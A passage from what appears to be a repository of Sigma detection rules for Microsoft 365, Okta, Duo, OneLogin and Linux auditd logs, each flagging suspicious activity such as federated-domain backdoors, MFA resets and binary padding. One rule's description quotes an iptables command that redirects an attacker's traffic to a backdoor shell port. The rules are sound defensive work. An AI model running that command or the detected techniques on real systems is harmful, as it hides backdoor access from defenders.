references: - https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/ - https://o365blog.com/post/aadbackdoor/ author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule) date: 2023-09-18 tags: - attack.defense-evasion - attack.privilege-escalation - attack.t1484.002 logsource: service: audit product: m365 detection: selection_domain: Operation|contains: 'domain' selection_operation: Operation|contains: - 'add' - 'new' condition: all of selection_* falsepositives: - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider. level: medium ================================================ FILE: rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml ================================================ title: New Federated Domain Added - Exchange id: 42127bdd-9133-474f-a6f1-97b6c08a4339 related: - id: 58f88172-a73d-442b-94c9-95eaed3cbb36 type: similar status: test description: Detects the addition of a new Federated Domain. 
references: - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf - https://us-cert.cisa.gov/ncas/alerts/aa21-008a - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html - https://www.sygnia.co/golden-saml-advisory - https://o365blog.com/post/aadbackdoor/ author: Splunk Threat Research Team (original rule), '@ionsor (rule)' date: 2022-02-08 tags: - attack.persistence - attack.t1136.003 logsource: service: exchange product: m365 detection: selection: eventSource: Exchange eventName: 'Add-FederatedDomain' status: success condition: selection falsepositives: - The creation of a new Federated domain is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at the same or a different cloud provider. level: medium ================================================ FILE: rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml ================================================ title: Activity from Suspicious IP Addresses id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: test description: | Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate a compromised account.
references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-23 modified: 2022-10-09 tags: - attack.command-and-control - attack.t1573 logsource: service: threat_detection product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Activity from suspicious IP addresses' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml ================================================ title: Activity Performed by Terminated User id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee status: test description: | Detects when Microsoft Cloud App Security reports activity for users whose accounts were terminated in Azure AD but who still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-23 modified: 2022-10-09 tags: - attack.impact logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Activity performed by terminated user' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml ================================================ title: Activity from Anonymous IP Addresses id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 status: test description: Detects when Microsoft Cloud App Security reports that users were active from an IP address that has been identified as an anonymous proxy IP address. references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-23 modified: 2022-10-09 tags: - attack.command-and-control - attack.t1573 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Activity from anonymous IP addresses' status: success condition: selection falsepositives: - User using a VPN or Proxy level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml ================================================ title: Activity from Infrequent Country id: 0f2468a2-5055-4212-a368-7321198ee706 status: test description: Detects when Microsoft Cloud App Security reports an activity from a location that was not recently visited, or was never visited, by any user in the organization.
references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-23 modified: 2022-10-09 tags: - attack.command-and-control - attack.t1573 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Activity from infrequent country' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml ================================================ title: Data Exfiltration to Unsanctioned Apps id: 2b669496-d215-47d8-bd9a-f4a45bf07cda status: test description: Detects when Microsoft Cloud App Security reports that a user or IP address used an unsanctioned app to perform an activity that resembles an attempt to exfiltrate information from your organization.
references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-23 modified: 2022-10-09 tags: - attack.exfiltration - attack.t1537 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Data exfiltration to unsanctioned apps' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml ================================================ title: Microsoft 365 - Impossible Travel Activity id: d7eab125-5f94-43df-8710-795b80fa1189 status: test description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2020-07-06 modified: 2021-11-27 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Impossible travel activity' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml ================================================ title: Logon from a Risky IP Address id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f status: test description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. 
references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-23 modified: 2022-10-09 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Log on from a risky IP address' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml ================================================ title: Microsoft 365 - Potential Ransomware Activity id: bd132164-884a-48f1-aa2d-c6d646b04c69 status: test description: Detects when Microsoft Cloud App Security reports that a user uploaded files to the cloud that might be infected with ransomware. references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: austinsonger date: 2021-08-19 modified: 2022-10-09 tags: - attack.impact - attack.t1486 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Potential ransomware activity' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml ================================================ title: PST Export Alert Using eDiscovery Alert id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 related: - id: 6897cd82-6664-11ed-9022-0242ac120002 type: similar status: test description: Alerts when a user has performed an eDiscovery search or exported a PST file from the search.
This PST file usually contains sensitive information, including email body content. references: - https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide author: Sorina Ionescu date: 2022-02-08 modified: 2022-11-17 tags: - attack.collection - attack.t1114 logsource: service: threat_management product: m365 definition: Requires the 'eDiscovery search or exported' alert to be enabled detection: selection: eventSource: SecurityComplianceCenter eventName: 'eDiscovery search started or exported' status: success condition: selection falsepositives: - PST export can be done for legitimate purposes, but due to the sensitive nature of its content it must be monitored. level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml ================================================ title: PST Export Alert Using New-ComplianceSearchAction id: 6897cd82-6664-11ed-9022-0242ac120002 related: - id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 type: similar status: test description: Alerts when a user has performed an export of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect a PST export even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage as well as activity originating from the cloud. references: - https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps author: Nikita Khalimonenkov date: 2022-11-17 tags: - attack.collection - attack.t1114 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter Payload|contains|all: - 'New-ComplianceSearchAction' - 'Export' - 'pst' condition: selection falsepositives: - Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored.
level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml ================================================ title: Suspicious Inbox Forwarding id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: test description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-22 modified: 2022-10-09 tags: - attack.exfiltration - attack.t1020 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Suspicious inbox forwarding' status: success condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml ================================================ title: Suspicious OAuth App File Download Activities id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: test description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. 
references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: Austin Songer @austinsonger date: 2021-08-23 modified: 2022-10-09 tags: - attack.exfiltration logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Suspicious OAuth app file download activities' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml ================================================ title: Microsoft 365 - Unusual Volume of File Deletion id: 78a34b67-3c39-4886-8fb4-61c46dc18ecd status: test description: Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files. references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: austinsonger date: 2021-08-19 modified: 2022-10-09 tags: - attack.impact - attack.t1485 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'Unusual volume of file deletion' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml ================================================ title: Microsoft 365 - User Restricted from Sending Email id: ff246f56-7f24-402a-baca-b86540e3925c status: test description: Detects when the Security Compliance Center reports a user who exceeded the sending limits of the service policies and has therefore been restricted from sending email.
references: - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference author: austinsonger date: 2021-08-19 modified: 2022-10-09 tags: - attack.initial-access - attack.t1199 logsource: service: threat_management product: m365 detection: selection: eventSource: SecurityComplianceCenter eventName: 'User restricted from sending email' status: success condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/cisco_duo/cisco_duo_mfa_bypass_via_bypass_code.yml ================================================ title: Cisco Duo Successful MFA Authentication Via Bypass Code id: 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8 status: test description: | Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems. 
references: - https://duo.com/docs/adminapi#logs - https://help.duo.com/s/article/6327?language=en_US author: Nikita Khalimonenkov date: 2024-04-17 tags: - attack.credential-access - attack.defense-evasion - attack.initial-access logsource: product: cisco service: duo detection: selection: event_type: authentication reason: bypass_user condition: selection falsepositives: - Legitimate user that was assigned on purpose to a bypass group level: medium ================================================ FILE: rules/identity/okta/okta_admin_activity_from_proxy_query.yml ================================================ title: Okta Admin Functions Access Through Proxy id: 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309 status: test description: Detects access to Okta admin functions through a proxy. references: - https://www.beyondtrust.com/blog/entry/okta-support-unit-breach - https://dataconomy.com/2023/10/23/okta-data-breach/ - https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/ author: Muhammad Faisal @faisalusuf date: 2023-10-25 tags: - attack.credential-access logsource: service: okta product: okta detection: selection: debugContext.debugData.requestUri|contains: 'admin' securityContext.isProxy: 'true' condition: selection falsepositives: - False positives are expected if administrators legitimately access these functions through a proxy. Apply additional filters if necessary. level: medium ================================================ FILE: rules/identity/okta/okta_admin_role_assigned_to_user_or_group.yml ================================================ title: Okta Admin Role Assigned to an User or Group id: 413d4a81-6c98-4479-9863-014785fd579c status: test description: Detects when the Administrator role is assigned to a user or group.
references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.privilege-escalation - attack.persistence - attack.t1098.003 logsource: product: okta service: okta detection: selection: eventtype: - group.privilege.grant - user.account.privilege.grant condition: selection falsepositives: - Administrator roles could be assigned to users or groups by other admin users. level: medium ================================================ FILE: rules/identity/okta/okta_admin_role_assignment_created.yml ================================================ title: Okta Admin Role Assignment Created id: 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c status: test description: Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Nikita Khalimonenkov date: 2023-01-19 tags: - attack.persistence logsource: product: okta service: okta detection: selection: eventtype: 'iam.resourceset.bindings.add' condition: selection falsepositives: - Legitimate creation of a new admin role assignment level: medium ================================================ FILE: rules/identity/okta/okta_api_token_created.yml ================================================ title: Okta API Token Created id: 19951c21-229d-4ccb-8774-b993c3ff3c5c status: test description: Detects when an API token is created. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.persistence logsource: product: okta service: okta detection: selection: eventtype: system.api_token.create condition: selection falsepositives: -
Legitimate creation of an API token by authorized users level: medium ================================================ FILE: rules/identity/okta/okta_api_token_revoked.yml ================================================ title: Okta API Token Revoked id: cf1dbc6b-6205-41b4-9b88-a83980d2255b status: test description: Detects when an API Token is revoked. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact logsource: product: okta service: okta detection: selection: eventtype: system.api_token.revoke condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/okta/okta_application_modified_or_deleted.yml ================================================ title: Okta Application Modified or Deleted id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d status: test description: Detects when an application is modified or deleted. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact logsource: product: okta service: okta detection: selection: eventtype: - application.lifecycle.update - application.lifecycle.delete condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/okta/okta_application_sign_on_policy_modified_or_deleted.yml ================================================ title: Okta Application Sign-On Policy Modified or Deleted id: 8f668cc4-c18e-45fe-ad00-624a981cf88a status: test description: Detects when an application Sign-on Policy is modified or deleted.
references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact logsource: product: okta service: okta detection: selection: eventtype: - application.policy.sign_on.update - application.policy.sign_on.rule.delete condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/okta/okta_fastpass_phishing_detection.yml ================================================ title: Okta FastPass Phishing Detection id: ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e status: test description: Detects when Okta FastPass prevents a known phishing site. references: - https://sec.okta.com/fastpassphishingdetection - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2023-05-07 tags: - attack.initial-access - attack.t1566 logsource: product: okta service: okta detection: selection: outcome.reason: 'FastPass declined phishing attempt' outcome.result: FAILURE eventtype: user.authentication.auth_via_mfa condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/identity/okta/okta_identity_provider_created.yml ================================================ title: Okta Identity Provider Created id: 969c7590-8c19-4797-8c1b-23155de6e7ac status: test description: Detects when a new identity provider is created for Okta. 
references: - https://developer.okta.com/docs/reference/api/system-log/ - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection author: kelnage date: 2023-09-07 tags: - attack.privilege-escalation - attack.persistence - attack.t1098.001 logsource: product: okta service: okta detection: selection: eventtype: 'system.idp.lifecycle.create' condition: selection falsepositives: - When an admin creates a new, authorised identity provider. level: medium ================================================ FILE: rules/identity/okta/okta_mfa_reset_or_deactivated.yml ================================================ title: Okta MFA Reset or Deactivated id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0 status: test description: Detects an attempt at deactivating or resetting MFA. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-21 modified: 2022-10-09 tags: - attack.persistence - attack.credential-access - attack.defense-evasion - attack.t1556.006 logsource: product: okta service: okta detection: selection: eventtype: - user.mfa.factor.deactivate - user.mfa.factor.reset_all condition: selection falsepositives: - If an MFA reset or deactivation was performed by a system administrator. level: medium ================================================ FILE: rules/identity/okta/okta_network_zone_deactivated_or_deleted.yml ================================================ title: Okta Network Zone Deactivated or Deleted id: 9f308120-69ed-4506-abde-ac6da81f4310 status: test description: Detects when a Network Zone is Deactivated or Deleted.
references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact logsource: product: okta service: okta detection: selection: eventtype: - zone.deactivate - zone.delete condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/okta/okta_new_behaviours_admin_console.yml ================================================ title: Okta New Admin Console Behaviours id: a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9 status: test description: Detects when Okta identifies new activity in the Admin Console. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection author: kelnage date: 2023-09-07 modified: 2024-06-26 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078.004 logsource: product: okta service: okta detection: selection_event: eventtype: 'policy.evaluate_sign_on' target.displayname: 'Okta Admin Console' selection_positive: - debugcontext.debugdata.behaviors|contains: 'POSITIVE' - debugcontext.debugdata.logonlysecuritydata|contains: 'POSITIVE' condition: all of selection_* falsepositives: - When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual. level: high ================================================ FILE: rules/identity/okta/okta_password_in_alternateid_field.yml ================================================ title: Potential Okta Password in AlternateID Field id: 91b76b84-8589-47aa-9605-c837583b82a9 status: test description: | Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files. 
references: - https://developer.okta.com/docs/reference/api/system-log/ - https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data - https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm author: kelnage date: 2023-04-03 modified: 2023-10-25 tags: - attack.credential-access - attack.t1552 logsource: product: okta service: okta detection: selection: legacyeventtype: 'core.user_auth.login_failed' filter_main: # Okta service account names start with 0oa # Email addresses are the default format for Okta usernames, so attempt # to exclude alternateIds that look like valid emails # If your Okta configuration uses different character restrictions, you # will need to update this regular expression to reflect that or disable the rule for your environment # Possible false negatives are failed login attempts with a password that looks like a valid email address actor.alternateid|re: '(^0oa.*|[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,10})' condition: selection and not filter_main falsepositives: - Unlikely level: high ================================================ FILE: rules/identity/okta/okta_policy_modified_or_deleted.yml ================================================ title: Okta Policy Modified or Deleted id: 1667a172-ed4c-463c-9969-efd92195319a status: test description: Detects when an Okta policy is modified or deleted. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact logsource: product: okta service: okta detection: selection: eventtype: - policy.lifecycle.update - policy.lifecycle.delete condition: selection falsepositives: - Okta Policies being modified or deleted may be performed by a system administrator. 
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/identity/okta/okta_policy_rule_modified_or_deleted.yml ================================================ title: Okta Policy Rule Modified or Deleted id: 0c97c1d3-4057-45c9-b148-1de94b631931 status: test description: Detects when a Policy Rule is Modified or Deleted. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact logsource: product: okta service: okta detection: selection: eventtype: - policy.rule.update - policy.rule.delete condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/okta/okta_security_threat_detected.yml ================================================ title: Okta Security Threat Detected id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 status: test description: Detects when a security threat is detected in Okta. 
references: - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.command-and-control logsource: product: okta service: okta detection: selection: eventtype: security.threat.detected condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/okta/okta_suspicious_activity_enduser_report.yml ================================================ title: Okta Suspicious Activity Reported by End-user id: 07e97cc6-aed1-43ae-9081-b3470d2367f1 status: test description: Detects when an Okta end-user reports activity by their account as being potentially suspicious. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md author: kelnage date: 2023-09-07 tags: - attack.resource-development - attack.t1586.003 logsource: product: okta service: okta detection: selection: eventtype: 'user.account.report_suspicious_activity_by_enduser' condition: selection falsepositives: - If an end-user incorrectly identifies normal activity as suspicious. level: high ================================================ FILE: rules/identity/okta/okta_unauthorized_access_to_app.yml ================================================ title: Okta Unauthorized Access to App id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 status: test description: Detects when unauthorized access to app occurs. 
references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact logsource: product: okta service: okta detection: selection: displaymessage: User attempted unauthorized access to app condition: selection falsepositives: - User might have believed that they had access. level: medium ================================================ FILE: rules/identity/okta/okta_user_account_locked_out.yml ================================================ title: Okta User Account Locked Out id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a status: test description: Detects when a user account is locked out. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ author: Austin Songer @austinsonger date: 2021-09-12 modified: 2022-10-09 tags: - attack.impact - attack.t1531 logsource: product: okta service: okta detection: selection: displaymessage: Max sign in attempts exceeded condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/identity/okta/okta_user_created.yml ================================================ title: New Okta User Created id: b6c718dd-8f53-4b9f-98d8-93fdca966969 status: test description: Detects new user account creation author: Nasreddine Bencherchali (Nextron Systems) date: 2023-10-25 references: - https://developer.okta.com/docs/reference/api/event-types/ tags: - attack.credential-access logsource: service: okta product: okta detection: selection: eventtype: 'user.lifecycle.create' condition: selection falsepositives: - Legitimate and authorized user creation level: informational ================================================ FILE: rules/identity/okta/okta_user_session_start_via_anonymised_proxy.yml ================================================ title: Okta User 
Session Start Via An Anonymising Proxy Service id: bde30855-5c53-4c18-ae90-1ff79ebc9578 status: test description: Detects when an Okta user session starts where the user is behind an anonymising proxy service. references: - https://developer.okta.com/docs/reference/api/system-log/ - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection author: kelnage date: 2023-09-07 tags: - attack.defense-evasion - attack.t1562.006 logsource: product: okta service: okta detection: selection: eventtype: 'user.session.start' securitycontext.isproxy: 'true' condition: selection falsepositives: - If a user requires an anonymising proxy due to valid justifications. level: high ================================================ FILE: rules/identity/onelogin/onelogin_assumed_another_user.yml ================================================ title: OneLogin User Assumed Another User id: 62fff148-278d-497e-8ecd-ad6083231a35 status: test description: Detects when a user assumed another user account. references: - https://developers.onelogin.com/api-docs/1/events/event-resource author: Austin Songer @austinsonger date: 2021-10-12 modified: 2022-12-25 tags: - attack.impact logsource: product: onelogin service: onelogin.events detection: selection: event_type_id: 3 condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/identity/onelogin/onelogin_user_account_locked.yml ================================================ title: OneLogin User Account Locked id: a717c561-d117-437e-b2d9-0118a7035d01 status: test description: Detects when a user account is locked or suspended. 
references: - https://developers.onelogin.com/api-docs/1/events/event-resource/ author: Austin Songer @austinsonger date: 2021-10-12 modified: 2022-12-25 tags: - attack.impact logsource: product: onelogin service: onelogin.events detection: selection1: # Locked via API event_type_id: 532 selection2: # Locked via API event_type_id: 553 selection3: # Suspended via API event_type_id: 551 condition: 1 of selection* falsepositives: - System may lock or suspend user accounts. level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_binary_padding.yml ================================================ title: Binary Padding - Linux id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba status: test description: | Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md author: Igor Fits, oscd.community date: 2020-10-13 modified: 2023-05-03 tags: - attack.defense-evasion - attack.t1027.001 logsource: product: linux service: auditd detection: selection_execve: type: 'EXECVE' keywords_truncate: '|all': - 'truncate' - '-s' keywords_dd: '|all': - 'dd' - 'if=' keywords_filter: - 'of=' condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter)) falsepositives: - Unknown level: high simulation: - type: atomic-red-team name: Pad Binary to Change Hash - Linux/macOS dd technique: T1027.001 atomic_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_bpfdoor_port_redirect.yml ================================================ title: Bpfdoor TCP Ports Redirect id: 70b4156e-50fc-4523-aa50-c9dddf1993fc status: test description: | All TCP traffic on a particular port from the attacker is routed to a different 
port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only. references: - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor author: Rafal Piasecki date: 2022-08-10 tags: - attack.defense-evasion - attack.t1562.004 logsource: product: linux service: auditd detection: cmd: type: 'EXECVE' a0|endswith: 'iptables' a1: '-t' a2: 'nat' keywords: - '--to-ports 42' - '--to-ports 43' condition: cmd and keywords falsepositives: - Legitimate ports redirect level: medium ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_capabilities_discovery.yml ================================================ title: Linux Capabilities Discovery id: fe10751f-1995-40a5-aaa2-c97ccb4123fe status: test description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges. 
